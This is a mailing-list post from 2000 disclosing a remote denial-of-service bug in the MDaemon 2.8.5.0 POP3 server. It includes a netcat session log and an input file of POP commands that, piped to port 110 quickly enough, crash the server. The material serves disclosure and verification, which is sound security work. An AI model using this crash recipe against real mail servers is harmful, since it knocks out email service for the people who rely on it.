Vulnerability Development mailing list archives
mdaemon 2.8.5.0 DoS
From: Craig () FREENET DE (Craig)
Date: Fri, 9 Jun 2000 18:11:36 +0200
mdaemon 2.8.5.0 remote DoS Win95 vulnerable (Tested on a K5-166 with 32MB RAM) Win98SE vulnerable (Tested on a K7-500 with 128MB RAM) A single user wasn´t able to receive eMail - after the password was send, the mail client just haltet, and did nothing till the timeout. I tried to find the error, by using netcat to enter the commands on my own and find out, whats wrong. Playing around something strange happened: --------------------LOG-START----------------------- netcat 192.168.0.3 110 +OK Server1 POP service ready using UNREGISTERED SOFTWARE [1] MDaemon v2.8.5.0 T User User1 +OK User1... Recipient ok pass yaddayadda {ENTER} -ERR that command is valid only in the AUTHORIZATION state! uidl -ERR unknown POP command! quit +OK . quit +OK User1 Server1 POP Server signing off (mailbox empty) --------------------LOG-END----------------------------------------- MDaemon crashed after leaving, showing 2 popups. If you try to verify this, write a input file: -----inputfile-------------- User User1 pass yaddayadda {just press ENTER} uidl quit quit -----eof-------------------- then: netcat [Server_to_test] 110 <inputfile You need to send the commands fast! The more messages you send, the more time you got to crash the server; you need to send all the commands before the status of the mailbox is shown ("+OK User1's mailbox has 3600 total messages (1018800 octets)."). When you see that message, it is to late... If there are too many files in a users directory (e.g. \mdaemon\users\User1") the Server needs a long time to read them (for the report - uidl), and the clients got timeouts because it takes a long time. Some people who were mailbombed could have the problem of not being able to receive their messages and could think their account was deleted or the password was changed. Craig -Craig () Freenet De- P.S.:English is not my mother language...
Current thread:
- Re: krb5 1.1.1 Trevor Schroeder (May 31)
- Re: krb5 1.1.1 Mariusz Woloszyn (Jun 05)
- ADV: /con/con is yet exploitable on most fservs Paulo Ribeiro (Jun 07)
- Re: ADV: /con/con is yet exploitable on most fservs Cam (Jun 08)
- Re: A<D>V: /con/con is yet exploitable on most fservs Niall Smart (Jun 08)
- weird bug found marco (Jun 09)
- Re: weird bug found hypoclear - lUSt - (Linux Users Strike Today) (Jun 09)
- ie5 and .doc URLs Olivier Thereaux (Jun 09)
- Re: ie5 and .doc URLs Chris Tobkin (Jun 09)
- Re: ie5 and .doc URLs Olle Segerdahl (Jun 09)
- mdaemon 2.8.5.0 DoS Craig (Jun 09)
- Re: ie5 and .doc URLs security-lists () SERVER KAPOW DK (Jun 09)
- Re: ie5 and .doc URLs Jason Haar (Jun 11)
- ADV: /con/con is yet exploitable on most fservs Paulo Ribeiro (Jun 07)
- Re: krb5 1.1.1 Mariusz Woloszyn (Jun 05)
- Re: krb5 1.1.1 horio shoichi (Jun 07)
- <Possible follow-ups>
- Re: krb5 1.1.1 horio shoichi (Jun 02)